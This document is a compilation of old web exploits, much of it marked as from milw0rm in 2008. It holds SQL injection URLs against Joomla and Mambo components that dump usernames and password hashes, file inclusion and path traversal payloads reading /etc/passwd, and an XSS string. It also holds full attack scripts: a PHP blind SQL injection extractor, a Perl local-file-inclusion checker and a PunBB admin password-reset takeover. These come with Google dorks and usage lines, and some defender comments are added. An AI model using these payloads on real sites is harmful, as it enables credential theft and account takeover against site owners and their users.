					# joomla SQL Injection(com_gallery)
EXPLOIT 1 :

index.php?option=com_gallery&Itemid=0&func=detail&id=-
99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,us
ername/**/from/**/mos_users/*

EXPLOIT 2 :

index.php?option=com_gallery&Itemid=0&func=detail&id=-
999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2Cpassword%2C0%2C0
%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_us
ers

# joomla SQL Injection(com_mcquiz)
ATTACKER CAN SEE PASSWORD AND USERNAME UNDER PAGE

EXAMPLE=www.xxxxx.com/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xx
x&tid= [EXPLOIT]

EXPLOIT=1=

1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat
(username,0x3a,password),0x3a/**/from/**/jos_users/*

EXPLOIT=2=

1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a
,password)/**/from/**/mos_users/*

Mambo
/index.php?option=com_quran&action=viewayat&surano=-
1+union+all+select+1,concat(username,0x3a,password
),3,4,5+from+mos_users+limit+0,20--

Joomla
/index.php?option=com_quran&action=viewayat&surano=-
1+union+all+select+1,concat(username,0x3a,password
),3,4,5+from+jos_users+limit+0,20--

Mambo Simpleboard Forum Component 1.0.3 Stable
(com_simpleboard)
Exploit:
http://site.com/index.php?option=com_simpleboard&func=view&catid=-
999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_us
ers/*
# Mambo Component com_accombo 1.X SQL Injection
EXPLOIT :
index.php?option=com_accombo&func=detail&Itemid=S@BUN&id=-
99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0
x3a,password)/**/from/**/mos_users/*
Joomla Component MyAlbum 1.0 SQL Injection
Vulnerability
Example:

http://www.akparti.org.tr/disiliskiler/index.php?option=com_myalbum&album=-
1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/
*
[o] Online FlashQuiz<= 1.0.2 Remote File Inclusion
Vulnerability
[o] Exploit
  |
  |
http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc
.php?base_dir=[evilcode]        |
  |

MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL
Injection Vulnerability
Example:
#
#
http://[target]/pages.php?page='union/**/select/**/1,unhex(hex(concat_ws(0x20
2d20,username,password))),3,4,5,6,7/**/FROM/**/mybb_users/* #
#
ExBB <= 0.22
# Example:
 GET
site.it/Ex/modules/threadstop/threadstop.php?exbb[default_lang]=../../../../.
./../[File]%00   #
 GET
site.it/Ex/modules/threadstop/threadstop.php?exbb[default_lang]=../../../../.
./install.php%00 #

 POST site.it/Ex/modules/threadstop/threadstop.php?
new_exbb[home_path]=http://www.google.it?      #
 POST site.it/Ex/modules/threadstop/threadstop.php?
exbb[home_path]=http://www.yoursite.com/page? #

Joomla and Mambo Component joomlaxplorer <=1.6.2
exploit =>
target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=../.
./[directory]

example :

site.com/joomla/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2
F..%2F..%2F%2F..%2F..%2Fetc

site.com/joomla/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2
F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed

exploit =>
target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx
&order=name&srt=yes&error=[XSS]

example :
www.target.com/path/index.php?option=com_joomlaxplorer&action=show_error&dir=
hsmx&order=name&srt=yes&error=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

Joomla and Mambo Component com_extplorer
exploit =>
target.com/path/index.php?option=com_extplorer&action=show_error&dir=../../[d
irectory]

example :
site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%
2F..%2F%2F..%2F..%2Fetc

site.com/joomla/index.php?option=com_extplorer&action=show_error&dir=..%2F..%
2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed



Mumbo Jumbo Media - OP4 - Blind SQL Injection Exploit

<?php
// Boolean-based blind SQL injection probe against the `id` parameter of
// index.php. Every request appends an `and <condition>--` clause to a valid
// page id and uses the German "page does not exist" message as the oracle:
// when the message is absent the condition is taken to be true.
//
// Defender notes:
//  - Detection: access-log entries whose id parameter contains
//    `+and+length((select` or `+and+ascii(substring((select`; the probe
//    issues hundreds of such requests in a tight sequence from one client.
//  - Mitigation on the application side: the id must never be concatenated
//    into SQL; bind it as a parameter or cast it to int before use.
//
// Disable the CLI execution-time limit: the loops below issue one blocking
// HTTP request per guessed value (up to 50 + 50*75 + 32*55 requests).
ini_set("max_execution_time",0);
// Banner and usage text. $argv[0] (the script name) is spliced into the
// usage lines; the rest is a single-quoted literal.
print_r('
###############################################################
#
#     Mumbo Jumbo Media - OP4 - Blind SQL Injection Exploit
#
#         Vulnerability discovered by: Lidloses_Auge
#         Exploit coded by:            Lidloses_Auge
#         Greetz to:                   Free-Hack, GPM
#         Date:                        13.04.2008
#
###############################################################
#
#         Dork: "mumbo jumbo media" + inurl:"index.php"
#         Usage: php '.$argv[0].' [Target] [Page ID] [Admin ID]
#         Example for "http://www.site.com/cms/index.php?id=300"
#         => php '.$argv[0].' http://www.site.com/cms/ 300 1
#
###############################################################
');
// Only runs when at least one CLI argument is present. Positional arguments
// (per the usage text): $argv[1] base URL, $argv[2] a valid page id,
// $argv[3] the op4_admin row id. Nothing is validated; a missing $argv[2] or
// $argv[3] is interpolated as an empty string.
if ($argc > 1) {
print_r('
');
    echo 'Searching for Admin: ';
    // Phase 1: infer the length of op4_admin.kennung (the admin login) by
    // asking `length(...) = $i` for $i in 1..50.
    // As wrapped in this listing, the single-quoted URL literal spans two
    // lines, so the request as built here contains a line break inside
    // the word "kennung".
    for($i=1; $i <= 50; $i++) {
        $temp1 =
file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+length((select+kenn
ung+from+op4_admin+where+id='.$argv[3].'))='.$i.'--');
        // strpos() returns false when the marker is absent and `false == 0`
        // holds under loose comparison, so this fires when the error text is
        // missing (or happens to sit at offset 0).
        if (strpos($temp1,'Die angeforderte Seite existiert nicht') == 0) {
            $adlen = $i;
            $i = 50;   // forces the for-condition to fail: first hit ends the search
        }
    }
    // Phase 2: recover the login one character at a time. $zahl is the
    // ASCII code being tested; the `== 57` branch below jumps from '9' to 96
    // so the loop continues at 97 ('a'), skipping punctuation and uppercase.
    for($i=1; $i <= $adlen; $i++) {
        for($zahl=48; $zahl <= 122; $zahl++) {
            $temp =
file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((se
lect+kennung+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--');
            if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) {
                echo chr($zahl);
                $zahl = 122;   // match found: leave the inner loop
            }
            if ($zahl == 57) {
                $zahl = 96;
            }
        }
    }
print_r('
');
    echo 'Searching for Hash: ';
    // Phase 3: same technique for the 32-character op4_admin.passwort value,
    // testing only the hex alphabet (48..57 digits, then letters up to 102 'f').
    for($i=1; $i <= 32; $i++) {
      for($zahl=48; $zahl <= 102; $zahl++) {
         // `=` is an assignment, not a comparison: the condition is always
         // false and this block is never entered as written.
         if ($check = 0) {
            $temp2 =
file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((se
lect+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))<97--');
            if (strpos($temp2,'Die angeforderte Seite existiert nicht') == 0)
{
               $zahl = 97;
               $check = 1;
            }
         }
         $temp =
file_get_contents($argv[1].'index.php?id='.$argv[2].'+and+ascii(substring((se
lect+passwort+from+op4_admin+where+id='.$argv[3].'),'.$i.',1))='.$zahl.'--');
         if (strpos($temp,'Die angeforderte Seite existiert nicht') == 0) {
            echo chr($zahl);
            $zahl = 102;   // match found: leave the inner loop
         }
         // After '9' (57) the counter is set to 97 and the loop's own
         // increment then advances it to 98 before the next request.
         if ($zahl == 57) {
            $zahl = 97;
         }
      }
      $check = 0;
   }
}
?>

# milw0rm.com [2008-04-13]




phpBB Module XS 2.3.1 Local File Inclusion Expl
           ..%%%%....%%%%...%%..%%...........%%%%...%%%%%...%%%%%%..%%...%%.
           .%%......%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%...%%.
           ..%%%%...%%..%%..%%%%%%..%%%%%%..%%......%%%%%...%%%%....%%.%.%%.
           .....%%..%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%%%%%%.
           ..%%%%....%%%%...%%..%%...........%%%%...%%..%%..%%%%%%...%%.%%..
           .................................................................

[+] Software: phpBB Module XS 2.3.1
[+] Vendor: http://www.phpbbmods.de
[+] Download: http://www.phpbbmods.de/downloads.php?view=detail&id=3

[~]   Vulnerability found by: bd0rk
[~]   Contact: bd0rk[at]hackermail.com
[~]   Website: http://www.soh-crew.it.tt
[~]   Greetings: str0ke, TheJT, maria

[+] Vulnerable Code in /admin/admin_xs.php line 33
[+] Code: include_once('xs_include.' . $phpEx);
[+] It is a local file inclusion

[+]Exploitcode:

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

# Banner.
print   "\t\t+++++++++++++++++++++++++++++++++++++++++++++++++++\n\n";
print   "\t\t+                                                 +\n\n";
print   "\t\t+ phpBB Module XS 2.3.1 Local File Inclusion Expl +\n\n";
print   "\t\t+                                                 +\n\n";
print "\t\t+++++++++++++++++++++++++++++++++++++++++++++++++++\n\n";

# Without a target argument only the usage text is printed; no request is made.
if (!$ARGV[0])
{
print "Usage: expl.pl [target]\n";
print "Example: expl.pl http://127.0.0.1/directory/admin/\n";
}

else
{
$web=$ARGV[0];
chomp $web;

# Query string appended to the target: phpEx is set to a directory-traversal
# path ending in %00 (a NUL byte; older PHP releases truncated filesystem
# paths at NUL). This targets the include_once('xs_include.' . $phpEx) line
# quoted above, which -- presumably via register_globals -- takes $phpEx from
# the request; verify against the vendor code.
# As wrapped in this listing, the double-quoted string spans two lines, so a
# newline is embedded in the request path.
# Defender notes: the application-side fix is to never derive an include
# path from request input (hard-code the extension); in access logs, look for
# requests to admin_xs.php whose phpEx value contains "../" or "%00".
$file="admin_xs.php?phpEx=../../../../../../../../../../../../../../../../etc
/passwd%00";

my $web1=$web.$file;
print "$web1\n\n";
my $agent = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
# Whole response (status line, headers and body) as a single string.
$doc = $agent->request($req)->as_string;

# /m makes ^ match at every line start, so this checks whether any line of the
# response begins with "root" (the first field of a passwd entry).
if ($doc=~ /^root/moxis ){
print "This is vulnerable\n";
}
else
{
print "It is not vulnerable\n";
}
}

# milw0rm.com [2008-03-24]




Punbb <= 1.2.16
<?php
/**
 * Original : http://sektioneins.de/advisories/SE-2008-01.txt
 * Thanks to Stefan Esser, here's the exploit.
 *
 * Team : EpiBite
 * firefox, petit-poney, thot
 * Nous tenons a remercier nos mamans et papas respectifs.
 * Let's get a fu*** coffee !
 */

// conf
// Base URL of the forum plus the credentials of an ordinary account on it;
// the script logs in with that account to learn the site's cookie hash.
define('URL', 'http://localhost/punbb_1-2-16_fr/upload');       // base url
define('EMAIL', 'login_x@epitech.net');                                 // your email
define('LOGIN', 'login_x');                                     // your login
define('PASS', '620553.8I73');                                  // your pass
// Exploit
//
// What the code below does, in order:
//   1. read the user list sorted by registration date and take the first
//      user's name (ADMIN) and registration day (DATE);
//   2. request a password reset for EMAIL and scrape a mailto: link from the
//      response (ADMIN_MAIL);
//   3. request a reset for ADMIN_MAIL with a forged punbb_cookie and read the
//      cookie hash the server sets back (MD5_NOT_LOGGUED);
//   4. log in as LOGIN/PASS and read the logged-in cookie hash (MD5_LOGGUED);
//   5. search a two-day window of timestamps from DATE for the 8-char SEED,
//      then search mt_srand() seeds 0..999999 for the one (SRAND) that
//      reproduces MD5_NOT_LOGGUED;
//   6. replay the generator from SRAND to obtain the reset key and call
//      profile.php?action=change_pass with it.
// Root cause, as exercised by this script: the reset key comes from
// mt_rand() with a seed small enough to enumerate, and the per-site seed is
// assumed to be derived from a registration timestamp. Mitigation: generate
// reset tokens and seeds with a CSPRNG (random_bytes()/random_int()), never
// from mt_rand() or time(); a reset token should also be bound to the
// requesting account and expire.
printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL);
$h = curl_init();
// Step 1: user list ascending by registration date. The URL literal spans
// two lines as wrapped in this listing, so it contains a line break.
curl_setopt($h, CURLOPT_URL,
URL.'/userlist.php?username=&show_group=-
1&sort_by=registered&sort_dir=ASC&search=Envoyer');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
$s = curl_exec($h);
// First profile link on the page: $m[1] is the id, $m[2] the display name.
preg_match('/profile\.php\?id=([0-9]*)">([^<]*)</', $s, $m);
define('ADMIN', $m[2]);
// First "tcr" cell holds a YYYY-MM-DD date; converted to a midnight timestamp.
preg_match('/<td class="tcr">([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s,
$m);
if (count($m))
  define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1]));
else
  define('DATE', time() - 86400); //just in case, the forum or account just has been created
printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE);
// Step 2: password-reset request for EMAIL; the first mailto: href in the
// response is taken as the admin's address.
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',

'req_email='.urlencode(EMAIL),

'request_pass=Envoyer')));
preg_match('/mailto:([^"]*)"/', curl_exec($h), $m);
define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically get, set manually if there's problem)
printf("Admin mail : %s\n--\n", ADMIN_MAIL);
// Step 3: same reset request for ADMIN_MAIL, sent with a forged
// punbb_cookie (serialized [2, md5('bite')]). CURLOPT_HEADER is on so the
// Set-Cookie header can be read from the returned string.
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_COOKIE,
'punbb_cookie='.rawurlencode(serialize(array(0 => 2, 1 =>
md5('bite')))));
curl_setopt($h, CURLOPT_HEADER, 1);
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',

'req_email='.urlencode(ADMIN_MAIL),

'request_pass=Envoyer')));
$s = curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
// NOTE: unserialize() on data received from the remote server; a hostile
// server could return an arbitrary object graph here. Element 1 of the
// cookie array is the hash of interest.
$c = unserialize(urldecode($m[1]));
define('MD5_NOT_LOGGUED', $c[1]);
printf("Md5 not loggued : %s\n--\n", MD5_NOT_LOGGUED);
// Step 4: real login with LOGIN/PASS; the logged-in cookie hash is read the
// same way (same unserialize() caveat as above).
$h = curl_init();
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=in');
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($h, CURLOPT_HEADER, 1);
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
curl_setopt($h, CURLOPT_POST, 1);
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
                                                     'redirect_url=index.php',
                                                     'req_username='.LOGIN,
                                                     'req_password='.PASS)));
$s = curl_exec($h);
preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
$c = unserialize(urldecode($m[1]));
define('MD5_LOGGUED', $c[1]);
printf("Md5 loggued : %s\n--\n", MD5_LOGGUED);
// Despite the name, this is sha1() of the password, not md5().
define('PASS_MD5ED', sha1(PASS));
$chars = array('/', '-', "\\", '|');
// Step 5a: candidate site seed = last 8 hex chars of md5(DATE + $p) for each
// second $p in a 2-day window; accepted when md5(seed . sha1(PASS)) equals
// the logged-in cookie hash. $chars drives a console spinner every 300
// iterations. If no candidate matches, SEED is never defined and the
// printf() after the loop fails on the undefined constant.
for ($p = 0; $p < 86400 * 2; $p++)
{
  if (!($p % 300))
    echo $chars[($p / 300) % 4]."\r";
  if (strcmp(MD5_LOGGUED, md5(substr(md5((int)(DATE + $p)),
-8).PASS_MD5ED)) == 0)
    {
      define('SEED', substr(md5(DATE + $p), -8));
      break;
    }
}
printf("Seed : %s\n--\n", SEED);
// Step 5b: enumerate mt_srand() seeds; the first whose random_pass(8)
// output hashes with SEED to MD5_NOT_LOGGUED is SRAND. Same caveat: SRAND
// stays undefined if no seed matches.
for ($p = 0; $p < 1000000; $p++)
{
  if (!($p % 300))
    echo $chars[($p / 300) % 4]."\r";
  mt_srand((double)$p);
  if (strcmp(md5(SEED.random_pass(8)), MD5_NOT_LOGGUED) == 0)
    {
      define('SRAND', $p);
      break;
    }
}
printf("SRAND : %s\n--\n", SRAND);
// Step 6: replay the generator from SRAND. Three successive random_pass(8)
// calls: the first result is discarded, the second is printed as the new
// password, the third is sent as the change_pass key.
mt_srand(SRAND);
random_pass(8);
printf("New password : %s\n--\n", random_pass(8));
$url = URL.'/profile.php?id=2&action=change_pass&key='.random_pass(8);// Id is set to '2' (the admin's id, but you can change your target)
$h = curl_init();
curl_setopt($h, CURLOPT_URL, $url);
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
// Response body is fetched and discarded.
curl_exec($h);
/**
 * Build a pseudo-random alphanumeric string of the requested length.
 *
 * Each character is chosen with mt_rand() modulo the alphabet size, so the
 * output is fully determined by the current mt_srand() state — which is
 * exactly why it must never be used for security tokens (use random_int()
 * or random_bytes() for those).
 *
 * @param int $len number of characters to produce; 0 or less yields ''
 * @return string
 */
function random_pass($len)
{
  $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
  $size = strlen($alphabet);
  $out = '';
  $i = 0;
  while ($i < $len) {
    // mt_rand() is non-negative, so the index is always within the alphabet.
    $out .= $alphabet[mt_rand() % $size];
    $i++;
  }
  return $out;
}

# milw0rm.com [2008-02-21]

				